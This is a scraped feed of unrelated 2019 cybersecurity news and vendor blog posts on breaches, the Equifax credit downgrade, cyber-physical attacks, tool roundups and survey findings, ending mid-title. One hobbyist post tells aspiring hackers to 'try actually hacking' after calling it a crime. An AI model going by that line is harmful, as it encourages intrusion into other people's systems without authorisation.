Recently, a private firm named SolarWinds which engages with the IT management sector disclosed the result of its Freedom of Information (FOI) request, showing that the public-sector experienced an increasing number of cyber attacks for the past year 2018. 18% of all public sectors in the UK experienced either a ransomware exploits, phishing attack and common virus infections, especially those that interface with foreign/diplomatic entities. The same report also shows that the effectiveness of available antimalware solutions in the market reaches 96%, 98% if you count those solutions categorized as Endpoint protections (corporate-level antivirus product). Firewall hardware was also a focus for review, as it successfully blocked unauthorized access 98% of the time.

Unfortunately, the statistics show weakness with the capability of the public sector to perform a post-audit process once a cyber attack made a successful operation. This is because only 73% of the public sector have a reliable log management system in their network installations. These same organization also lack dependable network traffic analysis which will be useful for forensic investigations after a cyber attack happened “While preparation is generally high throughout the public sector, the growth in large numbers of attacks shows that there is still a significant risk. These results highlight the importance of finding simple-to-use, affordable, and scalable security solutions that can work across the varied IT environments like those in the NHS and central government, to ensure the most comprehensive protection available for these vital services,” explained Sascha Giese, SolarWind’s Technical Lead.

Just like the rest of the European region, the UK public sector faces a lot of challenge, given that they operate due to British tax, funding for credible cybersecurity defense posture is not a walk-in-the-park. Cybersecurity defense posture not only requires the hardware and software that run the entire infrastructure, but also human operators, IT professionals such as network administrators, database admins and software developers cost money to hire and remain productively happy with their jobs.

The saddest part of the report is around 9% of the UK public sector has no organized way to train their employees to be cybersecurity risks aware. While the other 15% just left their current employees to their devices, ignored the risks of new flaws, exploits and social engineering techniques that may one day victimize one of the employees in question. Login credential theft is no common, but also not uncommon – as the public sector employees are privileged with having access to public information, their login credentials are also top prizes for threat actors to steal.

Related Resources:

How Is The British Government Revamping Its Take On Cybersecurity?

Essential Cybersecurity Tools for Business Organizations

5 Fundamental Cybersecurity Issues With Email

Ways To Make The Human Factor A Non-Issue In Cybersecurity

The post UK’s FOI Request Exposes British Government Cybersecurity Weaknesses appeared first on .

Structural integrity: Quantifying risk with security measurement

In my previous post, we set up the foundation for a risk quantification program. Many organizations have begun this part of their security strategy and are learning how to approach this challenge, which has plagued the security industry for years. In this part, we talk about how a winning security metrics strategy aligns with the business’ goals and objectives and lay out the framework to develop the metrics strategy. Security metrics are business metrics A … More

The post Structural integrity: Quantifying risk with security measurement appeared first on Help Net Security.

SD-WAN alone cannot address the networking challenges of digital business

Enterprise IT professionals are turning to managed services for their SD-WAN deployments. At the same time, a new Cato Networks survey finds legacy telco services inadequately address customer expectations around speed, agility, and overall value. “The digital business demands a faster, more agile network to drive growth and compete effectively in the marketplace. Legacy telcos rely on rigid, fragmented, and expensive bundles of point solutions — an approach incompatible with the digital business. To support … More

The post SD-WAN alone cannot address the networking challenges of digital business appeared first on Help Net Security.

Network automation market expected to grow to $16.9 billion by 2022

According to market research by MarketsandMarkets, the network automation market size is expected to grow from $2.3 billion in 2017 to $16.9 billion by 2022, at a Compound Annual Growth Rate (CAGR) of 48.7% during the forecast period. Major drivers of the network automation market include the critical need for network bandwidth management and network visibility, and growing adoption of smart connected devices across industry verticals. Moreover, increasing adoption of virtual and software-defined network infrastructure … More

The post Network automation market expected to grow to $16.9 billion by 2022 appeared first on Help Net Security.

How to diminish the great threat of legacy apps

The Equifax breach underscored the risk posed by unpatched software applications. As a refresher, 146 million customer records were exposed after a known vulnerability in Apache Struts was exploited. The reality is enterprises are supporting an ever-growing number of applications, both commercial and homegrown which has created many challenges in maintaining proper security patches for even the most critical applications. That same challenge becomes even more difficult when you consider legacy enterprise applications that are … More

The post How to diminish the great threat of legacy apps appeared first on Help Net Security.

Volume and quality of training data is the largest barrier to applying machine learning

IDC predicts worldwide spending on artificial intelligence (AI) systems will reach $35.8 billion in 2019, and 84% of enterprises believe investing in AI will lead to greater competitive advantages (Statista). However, nearly eight out of 10 enterprise organizations currently engaged in AI and machine learning (ML) report that projects have stalled, and 96% of these companies have run into problems with data quality, data labeling required to train AI, and building model confidence, according to … More

The post Volume and quality of training data is the largest barrier to applying machine learning appeared first on Help Net Security.

How many adults trust companies with their personal data?

More than one third (36%) of adults aged 16–75 trust companies and organizations with their personal data more since GDPR came into effect one year ago, according to TrustArc. There are positive sentiments toward enforcement activity, and half (47%) of respondents have exercised some of their GDPR privacy rights. 57% of respondents are also more likely to use websites that have a certification mark or seal to demonstrate GDPR compliance. “The research tells a tale … More

The post How many adults trust companies with their personal data? appeared first on Help Net Security.

The Language of Risk: Bridging the Disconnect between the C-Suite and Cyber Security Experts

With data breaches regularly marking the headlines, it is no surprise that digital threats constitute an increasingly significant concern for the C-Suite and cyber security experts. What is surprising, however, is that these two groups don’t seem to share the same view of information security. They have different opinions when it comes to the digital […]… Read More

The post The Language of Risk: Bridging the Disconnect between the C-Suite and Cyber Security Experts appeared first on The State of Security.

Rise of cyber-physical attacks

Estimated reading time: 3 minutes

It was back in 2012 when the then Defense Secretary of the United States warned of the possibility of the country facing a “cyber-Pearl Harbor”. He painted a bleak possibility – that extremist groups and enemy nations would use cyber tools to gain access to critical switches and disrupt transport and infrastructure.

While an attack on such a grand scale has not materialized as yet, Panetta’s warning sounds even more pertinent in this day and age of the Internet of Things (IoT). We live in the era of smart, where every device has the smart label in front of it – smart televisions, smart vehicles, smart cities, smart toasters, smart lights, etc. The boundaries between the physical and the cyber has merged and there has been a rise of cyber-physical attacks – cyber attacks which have an impact in the physical world as well.

Not a new phenomenon

Of course, perhaps the most noteworthy cyber-physical attack was the Stuxnet malicious worm, discovered in 2010. While no one has claimed responsibility, it caused substantial damage to Iran’s nuclear program, causing the nuclear centrifuges to tear themselves apart. It was believed to be created by American & Israeli cyber experts.

But in recent years, there have been examples of cyber-physical attacks at a much lower scale but with a similar likelihood of destruction. In Italy this year, some researchers travelled to various construction sites and demonstrated to workers there that they could easily take control of construction cranes remotely making them perform actions they wished. The message was clear – construction cranes are incredibly vulnerable and in the hands of a malicious group, could cause immense destruction.

Shock and awe

At a grander scale, power grids in Ukraine were successfully targeted in December 2015 and the consequences were severe. Electricity supply was disrupted and more than 230 thousand people were left without power for one to six hours. In Germany in 2014, a cyber attack caused massive damage at a blast furnace in a German steel mill when attackers gained access to control systems, which led to parts of the plant failing and the blast furnace being damaged.

It’s quite clear then that enterprises also must take note of this growing and troubling trend of cyber-physical attacks and take the necessary steps required to secure themselves against this growing threat. Some of the ways they can do that is through:

  • Plug the gaps – Most cyber-physical attacks happen due to gaps in the enterprise’s network security. Enterprises must constantly keep monitoring their security perimeters and step in to plug those gaps as soon as possible.
  • Understand your environment – It is important for organizations to have an ear to the ground regarding the industry they operate in and what are the new threats. Staying aware of the new trends and vulnerabilities will ensure that they can react and respond to threats as soon as they emerge.
  • Create a culture of security – It is incumbent on enterprises to create a security-first approach in their organization. This includes training employees on the importance of cybersecurity, ensuring that there are strict policies regarding cybersecurity with compliance to it.
  • Include physical security with cybersecurity – As mentioned earlier, the boundaries between the physical and digital worlds are converging and enterprises must be secure in both the worlds. Physical security is also paramount in this regard with strict rules against tailgating, secure access control systems and proper storage of confidential information.
  • Use a secure cybersecurity solution – A strong cybersecurity solution will allow enterprises to secure their defenses along with monitoring their network activity. Enterprises can consider Seqrite’s Endpoint Security (EPS) which is a simple and innovative platform integrating advanced technologies to protect the network.

The post Rise of cyber-physical attacks appeared first on Seqrite Blog.

Equifax’s Nightmare Continues, Credit Rating “Negative”

Since 2017, Hackercombat.com covered the data breach incident of Equifax and all its relevant angles. The latest was just last March 9, 2019, when the U.S. Senate’s Committee on Homeland Security and Governmental Affairs released their committee report about the result of its probe of the incident. The report included not only the embarrassing situation of Equifax before and after the cyber attack, but also included proposals through legislation on helping companies not to become the next victim of a similar incident.

However, that was not the last episode in this long-running Equifax-drama series, the nightmare for Equifax is not yet ending as Moody’s, one of the global credit rating agencies has slapped the data analytics firm with a drastic credit rating downgrade. Moody’s downgrade is highlighted with the demotion of Equifax’s credit outlook from “stable” to “negative”, which will be felt by the company in the current year.

“We are treating this with more significance because it is the first time that cyber has been a named factor in an outlook change. This is the first time the fallout from a breach has moved the needle enough to contribute to the change,” explained Joe Mielenhausen, Moody’s Spokesperson.

With the downgrade, Equifax will have a hard time paying for their current loans, including the tougher time of persuading financial institutions for any future creditors. Moody’s blamed the $690 million after data breach expenses that Equifax had to absorb as the justification for the credit rating downgrade. The mentioned about was the closest estimate of all the expenses that Equifax incurred just to settle the class action lawsuits and all the state and federal fines facing the company after the incident.

“We estimate Equifax’s cybersecurity expenses and capital investments will total about $400 million in both 2019 and 2020 before declining to about $250 million in 2021. Beyond 2020, infrastructure investments are likely to remain higher than they had been before the 2017 breach. The heightened emphasis on cybersecurity for all data oriented companies, which is especially acute for Equifax, leads us to expect that higher cybersecurity costs will continue to hurt the company’s profit and free cash flow for the foreseeable future,” said Moody’s in a Press Release.

In November 2018, Moody’s made a change with their rating system adding cybersecurity risks handling and cases as a proportionate basis for judging the credit rating for an entity. It is a huge reform being implemented by Moody’s given that cybersecurity issues had not affected the credit rating of companies before.

“For us, it’s not something we view as a totally new idea. We’ve been in the risk management business for a very long time. This is to enhance our thinking about credit as cyber becomes more and more important. We haven’t yet moved a credit rating due to cyber risk or a cyber event, but we see the likelihood of credit-rating impact as steadily increasing. Different sectors have different levels of credit sensitivity to cyber risk. For those higher-risk sectors, there will be impact down to the individual issuer-level over time,” added Derek Vadala, Moody’s Lead for Investors Services Cyber Risk Group.

Related Resources:

Equifax’s Senate Investigation: What Went Wrong?

ICO Slaps Equifax with Maximum Fine for the 2017 Data Breach

Yet Another Equifax Employee Accused Of Insider Trading

Equifax Hack Again, Now a Redirect to a Fake Flash Update…

The post Equifax’s Nightmare Continues, Credit Rating “Negative” appeared first on .

Fundamentals Of Making A Hacker Out Of You

There is no academic background necessary to become a hacker, given that even the most popular hackers in our history, like Kevin Mitnick, were actually self-trained. However, anyone who wishes to be one needs to be familiar with everything related to computers and other computing devices such as smartphones, a good grasp of the English language is also an advantage, given that many programming languages were established with English as the base language used.

To become a hacker, it’s not enough to have knowledge on only one field. Enthusiasm is the key since self-training is a tough choice to teach oneself of the discipline as well as the relevant understanding of political and economic movements. To gain effective knowledge, you need to go to a university with an IT department, study in a specialized school to learn the basics of personal computers or sign-up for online tutorials to teach you the basics.

Are there qualifications necessary for hackers?
There is no qualification required to become a hacker, but we need to be clear here. Blackhat hacking is a crime in many jurisdictions, infiltrating a network or a remote computer without permission from the owners or administrators is no different from entering someone’s physical property without consent. The bottom line, like learning a sport or two, practice for becoming a hacker = try actually hacking. The other option is to become a white-hat hacker, which means you become part of a team that hacks systems “legally” as part of a penetration testing mission.

If you are starting from scratch, where should you start?
The best shortcut is to learn computers beyond the GUI. To use a more advanced operating system Linux, while also to improving your proficiency of XHTML and C. If you learn hacking on your own, you have to go through many difficult paths, it is rather difficult but fulfilling if used productively and lawfully. This is no different from learning to play a musical instrument on your own with some written references as your guides.

First, let’s talk about the GUI.

The screen you are staring at right now is an example of a Graphical User Interface (GUI). On the other hand, a screen with only text on a computer screen which often seen in sci-fi movies and dramas is called CLI (Command Line Interface).

Skills to handle Linux, which is an OS that is used frequently for programming, system administration and network administration are essential.

Also, there are many languages ​​required to become a hacker, from web page creation perspective to the language used for database management.

・ XHTML
・ Python
・ C language
・ PHP
・ JAVA
・ SQL

An example of a path to becoming a white-hat hacker:
White hackers are recruited by both general companies and government officials. Become a white hacker = become an IT professional with the task of keeping the network and computer systems secure by introducing simulated hacks against the very system of your employer. In the case of a typical size company, it is the job that holds responsibility for general-purpose cybersecurity.

It has a much broader scope of work than general-purpose white hackers but plays a very important role in society. If you are aiming for hackers from inexperience, you should first aim for employment at a general company, learning the ropes of their internal IT team. An interest with networking, network protocol management and decompiling a program are huge assets.

Making you a hacker in just one article is impossible to do, all we can say is continue reading our articles here at hackercombat.com can give you more insights at the world of cybersecurity today. A real white hat hacker is always updated of every important change and update about our real world, as it intertwined with computing, networking, the Internet and its contents.

Related Resources:

Hackers Used Slack To Avoid Network and Endpoint Detection

A Hacker Dumps Over One Billion User Records

Hackers Steal Around $41 Million in Bitcoin from Binance

Hackers Inject Scripts in WordPress Live Chat Plugin

The post Fundamentals Of Making A Hacker Out Of You appeared first on .

Essential Cybersecurity Tools for Business Organizations

Businesses today have become the prime target of cyberattacks of all kinds. This is because cybercriminals understand that targeting a business could get them huge amounts of data, both corporate data and sensitive personal data of customers. In recent times, large enterprises all across the world have been targeted by cybercriminals. Such attacks have resulted in the theft of financial and personal information belonging to millions of customers.

The cost of dealing with cyberattacks too is rising and in today’s context, a cyberattack could prove devastating for smaller businesses. There are lots of business organizations, especially the smaller ones, that get so crippled by cyberattacks that they are forced to close down within a few months of the attack.

Another aspect of the damage inflicted by cyberattacks is the damage caused to the reputation of any business, big or small. The trust that customers bestow upon a company, the overall credibility in the market and brand reputation are factors that contribute towards the success of any business. Cyberattacks impact all these in a great way and hence, it’s important that businesses need to protect their networks and infrastructure from all kinds of cyberattacks. For this, they need different kinds of tools, which would help them boost their defenses and protect their business assets and reputation. Investing in acquiring and deploying such tools is always a wise decision. Given the fact that the costs of cyberattacks that companies have to bear today are increasing, it would only be wise to have what all cybersecurity tools that are needed and try to prevent cyberattacks as much as possible.

Here’s a look at some of the best cybersecurity tools that are available in the market today…

XpoLog for Log Analysis

Log analysis tools help businesses in analyzing the logs that computers and other digital devices connected to their networks record. Most systems and devices log almost all computing processes happening within them and hence analyzing logs to study the patterns and trends could help in identifying and preventing security breaches or malware infections. Manual analysis is often difficult as log files offer dumps of data stored in plain text format. This is where log analysis tools come in. XpoLog is a highly useful tool that many businesses use today for conducting log analysis. Log files from all sources- endpoints, applications, servers etc- are collected and analyzed using AI (Artificial Intelligence). If any alarming patterns are seen, alerts are sent to the administrators, who could immediately take action so as to prevent damages to the business network and the possibilities of cyberattacks.

Riskified for Fraud Detection

Whenever there is an online transaction taking place, there is a chance of online fraud as well. Hackers who have already laid hands on personal or financial data could use the same to manipulate banking networks or e-commerce channels and thus do online frauds, which could cause big losses to businesses. Security tools like Riskified help prevent such online frauds that happen during online transactions; this is done using machine learning to analyze transactions and allow processing of legitimate orders/transactions only. The dynamic checkout feature of this tool automatically adjusts the checking process based on an individual user’s risk profile, thereby providing the user with different options to verify their purchases.

HoxHunt for Protection from Phishing Scams

Most cyberattacks start with a phishing scam that would provide cybercriminals with an opportunity to breach networks and compromise business infrastructures. The hackers use phishing emails either to steal credentials or to install malware that could later help them breach data. The best defense against this is undoubtedly is to stay alert and informed on the individual level. At the same time, there are tools that give protection against phishing scams. One such tool is HoxHunt, which works by teaching users how to identify malicious or phishing emails or messages. The tool uses an AI-driven engine to personalize phishing attacks and thus copies how real-world attacks look like. Once the attacks are identified, users can report them using a special plugin; they also get feedback on their performance.

Imperva for Application and Data Protection

Key network resources like web applications and databases are often targeted by hackers. They try to access such resources and hence it’s important to protect them using WAFs (Web Application Firewalls) and data protection services. Imperva is one tool that has a WAF and aids in DDoS attack mitigation as well. In today’s context, when businesses depend on on-premise devices as well as on cloud components, a tool like Imperva could help greatly. Imperva’s WAF checks all traffic and transactions and prevents malicious traffic from entering the network or impacting the cloud components. All unauthorized access to applications or databases is blocked.

Metasploit for Penetration Testing

Penetration testing is integral to ensuring cybersecurity for any business organization. As we know penetration testing tools simulate cyberattacks and check for security vulnerabilities and issues. Metasploit is an open source tool that helps IT administrators perform penetration testing on business networks. Metasploit can be configured to scan networks for exploits and then go on with deploying a payload to systems that have security vulnerabilities in them. The penetration testing framework, which works on Windows, Linus and Mac OSs, comes with some evasion tools that could circumvent existing security protocols and then look for security issues, which could be fixed before a real cyberattack happens.

Also, Read:

Business Intelligence is the Key to Stronger Cybersecurity – Here’s Why

Artificial Intelligence’s Deep Learning, A New Cybersecurity Tool?

Cybersecurity Risk Readiness Of Financial Sector Measured

How Healthcare Organizations Can Solve Cybersecurity Issues

The post Essential Cybersecurity Tools for Business Organizations appeared first on .

Solving the network visibility problem with NaaS

Network visibility is crucial for many things: making sure that the equipment works properly monitoring and tweaking the network’s performance and protecting it against attacks. “Network visibility also helps you update your cybersecurity strategy based on current threats. It’s important for the short term, as this is a very dynamic world, and for the long term because it allows an organization to improve its cyber resilience,” says Amit Bareket, CEO of Perimeter 81. The most … More

The post Solving the network visibility problem with NaaS appeared first on Help Net Security.

Enterprises: Analyze your IoT footprint to address security, privacy concerns

The Zscaler ThreatLabZ research team analyzed 56 million IoT device transactions to understand the types of devices in use, the protocols used, the locations of the servers with which they communicated, and the frequency of inbound and outbound communications. The analysis showed that more than 1,000 organizations have at least one IoT device transmitting data from the network to the internet via the Zscaler cloud platform. The most commonly detected IoT device categories included IP … More

The post Enterprises: Analyze your IoT footprint to address security, privacy concerns appeared first on Help Net Security.

Most security pros have considered quitting due to a lack of resources

Companies are suffering from a lack of resources, both in terms of people and technology (79 percent), and 72 percent have considered leaving their jobs for this reason, Censornet research reveals. Security professionals believe their jobs and the overall security of their organizations would benefit from an autonomous security solution that could automatically react to and prevent attacks. More technology is harming cybersecurity The survey found that security professionals are not being helped by their … More

The post Most security pros have considered quitting due to a lack of resources appeared first on Help Net Security.

High-risk behaviors expose most travelers to cyber risks

The travel industry and its customers are increasingly the targets of cyberattacks as criminals seek to monetize highly valuable travel data, according to the new IBM Security research. Compounding the problem, a new survey conducted by Morning Consult on behalf of IBM Security reveals that travelers are still blind to the risks they face on the road. The survey found that only 40% of respondents believed it was likely they would be targeted for cybercrime … More

The post High-risk behaviors expose most travelers to cyber risks appeared first on Help Net Security.

Game Golf Exposure Leaves Users in a Sand Trap of Data Concerns

Apps not only provide users with a form of entertainment, but they also help us become more efficient or learn new things. One such app is Game Golf, which comes as a free app, a paid pro version with coaching tools, or with a wearable analyzer. With over 50,000 downloads on Google Play, the app helps golfers track their on-course performance and use the data to help improve their game. Unfortunately, millions of golfer records from the Game Golf app were recently exposed to anyone with an internet connection, thanks to a cloud database lacking password protection.

According to researchers, this exposure consisted of millions of records, including details on 134 million rounds of golf, 4.9 million user notifications, and 19.2 million records in an activity feed folder. Additionally, the database contained profile data like usernames, hashed passwords, emails, gender, Facebook IDs, and authorization tokens. The database also contained network information for the company behind the Game Golf app, Game Your Game Inc., including IP addresses, ports, pathways, and storage information that cybercrooks could potentially exploit to further access the network. A combination of all of this data could theoretically provide cybercriminals with more information on the user, creating greater privacy concerns. Thankfully, the database was secured about two weeks after the company was initially notified of the exposure.

Although it is still unclear as to whether cybercriminals took a swing at this data, the magnitude of the information exposed by the app is cause for concern. Luckily, users can follow these tips to help safeguard their data:

  • Change your passwords. If a cybercriminal got a hold of the exposed data, they could easily gain access into other online accounts if your login credentials were the same across different platforms. Err on the side of caution and change your passwords to something strong and unique for each account.
  • Check to see if you’ve been affected. If you’ve used the Game Golf app and believe your data might have been exposed, use this tool to check or set an alert to be notified of other potential exposures.
  • Secure your online profiles. Use a security solution like McAfee Safe Connect to encrypt your online activity, help protect your privacy by hiding your IP address, and better defend against cybercriminals.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Game Golf Exposure Leaves Users in a Sand Trap of Data Concerns appeared first on McAfee Blogs.

New browser extensions for integrating Microsoft’s hardware-based isolation

The hardware-based isolation technology on Windows 10 that allows Microsoft Edge to isolate browser-based attacks is now available as a browser extension for Google Chrome and Mozilla Firefox.

We introduced the container technology in 2017. Since then, we have been evolving the technology and engaging with customers to understand how hardware-based isolation can best help solve their security concerns. We know that many of our customers depend on multi-browser environments to allow enterprise apps to meet various compatibility requirements and enable productivity. And while modern browsers are continuously working to mitigate vulnerabilities, there are still exposures across these complex engines that can lead to irreversible and costly damages.

To provide customers with a comprehensive solution to isolate potential browser-based attacks, we have designed and developed Windows Defender Application Guard extensions, now generally available, to allow customers to integrate hardware-based isolation with Google Chrome and Mozilla Firefox.

How it works

The extensions for Google Chrome and Mozilla Firefox automatically redirect untrusted navigations to Windows Defender Application Guard for Microsoft Edge. The extension relies on a native application that we’ve built to support the communication between the browser and the device’s Application Guard settings.

When users navigate to a site, the extension checks the URL against a list of enterprise sites defined by enterprise administrators. If the site is determined to be untrusted, the user is redirected to an isolated Microsoft Edge session. In the isolated Microsoft Edge session, the user can freely navigate to any site that has not been explicitly defined as enterprise-trusted by their organization without any risk to the rest of system. With our upcoming dynamic switching capability, if the user tries to go to an enterprise site while in an isolated Microsoft Edge session, the user is taken back to the default browser.

To configure the Application Guard extension under managed mode, enterprise administrators can follow these recommended steps:

  1. Ensure devices meet requirements.
  2. Turn on Windows Defender Application Guard.
  3. Define the network isolation settings to ensure a set of enterprise sites is in place.
  4. Install the new Windows Defender Application Guard companion application from the Microsoft Store.
  5. Install the extension for Google Chrome or Mozilla Firefox browsers provided by Microsoft.
  6. Restart the device.

Intuitive user experience

We designed the user interface to be transparent to users about Windows Defender Application Guard being installed on their devices and what it does. We want to ensure that users are fully aware that their untrusted navigations will be isolated and why.

  1. When users initially open Google Chrome or Mozilla Firefox after the extension is deployed and configured properly, they will see a Windows Defender Application Guard landing page. 
  2. If there are any problems with the configuration, users will get instructions for resolving any configuration errors. 
  3. Users can initiate an Application Guard session without entering a URL or clicking on a link by clicking the extension icon on the menu bar of the browser.

Commitment to keep enterprise users and data safe

Hardware-based isolation is one of the innovations that enhances platform security on Windows 10. It is a critical component of the attack surface reduction capabilities in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) and the broader unified security in Microsoft Threat Protection. With the new Application Guard extension for Google Chrome and Mozilla Firefox, customers can extend the security benefits of isolation in their environments and further reduce attack surface. Customers can confidently navigate the expansive internet with protection for enterprise and personal data.

The Windows Defender Application Guard extensions for Google Chrome and Mozilla Firefox are now available for Windows 10 Professional, Enterprise, and Education SKUs, version 1803 and later with latest updates.

 

Rona Song
Windows platform security team

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Follow us on Twitter @MsftSecIntel.

The post New browser extensions for integrating Microsoft’s hardware-based isolation appeared first on Microsoft Security.

Companies increasingly investing in container adoption, security remains an issue

87 percent of IT professionals are now running container technologies, with 90 percent of those running in production and 7 in 10 running at least 40 percent of their application portfolio in containers — an impressive increase from two years ago, when just 67 percent of teams were running container technologies in production, a Portworx and Aqua Security survey reveals. Hurdles Yet despite their pervasiveness, containers aren’t without hurdles: when asked to name their top … More

The post Companies increasingly investing in container adoption, security remains an issue appeared first on Help Net Security.

3 Things You Need to Know About Summer Cybersecurity

summer screen time

The summer season is quickly approaching. Users will take to the skies, roads, and oceans to travel throughout the world for a fun family adventure. But just because users take time off doesn’t mean that their security should. So, with the season’s arrival, we decided to conduct a survey so to better understand users’ cybersecurity needs, as well as help them leave their cybersecurity woes behind while having some fun in the sun. That’s why we asked our users what they are most concerned about during the summer, so we can help them protect what really matters. Let’s see what they had to say.

Sharing the Fun

When it comes to vacations, we’re constantly taking and sharing snaps of amazing memories. What we don’t plan on sharing is the metadata embedded in each photo that can give away more than we intended. In fact, from our research we found that people are 3x more likely to be concerned about their Social Security number being hacked than their photos. Given the risk a compromised SSN poses for the potential of identity theft, it’s no surprise that respondents were more concerned about it. However, to keep the summer fun secure, it’s also important to keep travel photos private and only share securely.

Flying Safely and Securely

From a young age, we have been taught to keep our Social Security number close to the chest, and this is evident in how we protect SSNs. As a matter of fact, 88% of people would be seriously worried if their Social Security number was hacked. The best way to keep a Social Security number secure this summer – don’t share it when purchasing plane tickets or managing travel reservations. All you need to provide is a credit card and passport.

Making Smartphone Security #1  

While on the go, travelers are often keenly aware of how exposed they are physically when carrying around credit cards, passports, suitcases, gadgets and more. However, they also need to think about securing their digital life, particularly their handheld devices. To keep personal photos protected while traveling this summer season, smartphone security must be a top priority. With nearly 40% of respondents concerned about sensitive personal photos being hacked, jet setters need to be proactive about security, not reactive. In fact, we’re reminded of just how important this fact is as we enter the month of June, Internet Safety Month. Just like your laptop or router, it’s vital to protect the personal data stored within a smartphone.

In order to help you stay secure this season, let’s put your travel security knowledge to the test.

Note: There is a widget embedded within this post, please visit the site to participate in this post's widget.

The post 3 Things You Need to Know About Summer Cybersecurity appeared first on McAfee Blogs.

Visiting the NSA

Yesterday, I visited the NSA. It was Cyber Command's birthday, but that's not why I was there. I visited as part of the Berklett Cybersecurity Project, run out of the Berkman Klein Center and funded by the Hewlett Foundation. (BERKman hewLETT -- get it? We have a web page, but it's badly out of date.)

It was a full day of meetings, all unclassified but under the Chatham House Rule. Gen. Nakasone welcomed us and took questions at the start. Various senior officials spoke with us on a variety of topics, but mostly focused on three areas:

  • Russian influence operations, both what the NSA and US Cyber Command did during the 2018 election and what they can do in the future;

  • China and the threats to critical infrastructure from untrusted computer hardware, both the 5G network and more broadly;

  • Machine learning, both how to ensure a ML system is compliant with all laws, and how ML can help with other compliance tasks.

It was all interesting. Those first two topics are ones that I am thinking and writing about, and it was good to hear their perspective. I find that I am much more closely aligned with the NSA about cybersecurity than I am about privacy, which made the meeting much less fraught than it would have been if we were discussing Section 702 of the FISA Amendments Act, Section 215 the USA Freedom Act (up for renewal next year), or any 4th Amendment violations. I don't think we're past those issues by any means, but they make up less of what I am working on.

Cybersecurity roundup – Jan to April ‘19

Estimated reading time: 2 minutes

2019 is not even halfway over and there is already a flurry of cyber attacks all over the globe. Network administrators and cybersecurity experts have to always be on their toes as, no one is safe from the risk of an attack or a data breach. Here is a list of some of the top incidents which made headlines when it comes to cybersecurity:

  • Facebook accidentally uploads email contacts of 1.5 million users

The world-renowned social networking giant just couldn’t catch a break. Facebook made global headlines for all the wrong reasons again in April 2019. It admitted in an announcement that it may have “unintentionally uploaded” email contacts of 1.5 million new users since May 2016. The beleaguered social networking giant stated these contacts were not shared with anyone else and were being deleted.

  • Personal data of German politicians leaked online

Germany was plunged into chaos when sensitive data belonging to hundreds of German politicians, celebrities and online figures were leaked online on a Twitter account in a huge leak in the country’s history. These documents included deeply personal identifiable information including private chats, credit card details, addresses, etc. The Chancellor of Germany, Angela Merkel was also amongst those who found their personal information leaked. Police later arrested a 20-year-old German man who admitted to being behind the hacking, telling police that he had taken advantage of weak passwords.

  • Security Lapse at Indane exposes millions of Aadhar numbers

Closer home in India, questions continue to arise over the cybersecurity preparedness of some of the country’s biggest companies. A French security researcher claimed that he discovered a security lapse which exposed millions of Aadhaar numbers of dealers and distributors associated with Indian oil company, Indane. The Aadhaar data of nearly 6.7 million were accessible and were left exposed. Indane later responded saying they did not host any Aadhaar data and hence there was no leak.

  • 6 TB of data stolen from US government contractor

The fact that no organization in the world is really safe from cyber attacks became even more evident in March, when the news emerged that Iranian-backed hackers had stolen a staggering 6 TB of data from Citrix Systems, a software company that handles sensitive projects for the US government. The data stolen included extremely confidential information related to NASA, aerospace contracts, FBI information, Saudi Arabia’s oil-related information, giving an idea of the sheer scale of the attack. The most important cybersecurity lesson to be learnt from this? The hackers got access through “password spraying” – guessing weak passwords and then going inside.

  • Data breach at Airbus

The aircraft manufacturing giant faced a crisis this year, when it reported that it had detected a cyber attack on its information systems which resulted in a data breach. Though it did not affect their operations, Airbus did admit that employee-related details had been lost in the breach. While they did not reveal the number of records, the fact that a breach could take place on the servers of the world’s second-largest aircraft manufacturers, reveals that even the biggest companies are still coming to terms with increasingly changing threats in the murky world of cybersecurity.

The post Cybersecurity roundup – Jan to April ‘19 appeared first on Seqrite Blog.

The security challenges of managing complex cloud environments

Holistic cloud visibility and control over increasingly complex environments are essential for successful deployments in various cloud scenarios, a Cloud Security Alliance and AlgoSec study reveals. The survey of 700 IT and security professionals aims to analyze and better understand the state of adoption and security in current hybrid cloud and multi-cloud security environments, including public cloud, private cloud, or use of more than one public cloud platform. Key findings of the study include: Cloud … More

The post The security challenges of managing complex cloud environments appeared first on Help Net Security.

Is your perimeter inventory leaving you exposed? Why it’s time to switch from IP to DNS

Historically, security teams and tools have used IP addresses to define their targets and scopes. But in a world where applications and networks are increasingly cloud-hosted or integrated with third-party services, IP addresses alone aren’t enough to ensure coverage. Modern perimeters are dynamic and constantly changing, which can lead organizations to have an inaccurate picture of their risk simply by failing to properly catalog what Internet facing assets they have. Testing against a stale set … More

The post Is your perimeter inventory leaving you exposed? Why it’s time to switch from IP to DNS appeared first on Help Net Security.

Data Security in the Cloud: How to Lock Down the Next-Gen Perimeter

Enjoy the video replay of the recent Threatpost cloud security webinar, featuring a panel of experts offering best practices and ideas for managing data in a cloudified world.

Five ways automating IAM saves you money

Identity is the foundation of security, so a robust automated identity and access management (IAM) system is by far the best way to keep your company’s information safe. It’s also a great way to increase efficiency and save money. It’s no wonder so many businesses are adopting IAM systems. The global market value of identity and access management systems has grown from $4.5 billion in 2012 to $7.1 billion in 2018. By 2021, it is … More

The post Five ways automating IAM saves you money appeared first on Help Net Security.

On the path to Zero Trust security: Time to get started

No need to belabour the point. We all know that trying to defend the network perimeter is a bit futile in today’s mobile and cloud first world. So, the obvious question – what’s next? Vendors are quick to come to your aid with their latest, next generation, virtualized, machine learning and AI based security platform. Industry analysts on the other hand are proposing various security frameworks and approaches for reducing risk. Whether it’s Gartner with … More

The post On the path to Zero Trust security: Time to get started appeared first on Help Net Security.

Ransomware and malware attacks decline, attackers adopting covert tactics

There has been a major decline in ransomware and malware attacks, with Ireland having some of the lowest rates globally, according to the latest report released by Microsoft. This is a significant change from 2017, following a prolific series of attacks that targeted supply chains globally. Initial predictions were that these would increase, however, improvements in cybersecurity measures and detection have impacted on the success rates of these attacks. In fact, there has been a … More

The post Ransomware and malware attacks decline, attackers adopting covert tactics appeared first on Help Net Security.

Over half of all reported vulnerabilities in Q1 2019 have a remote attack vector

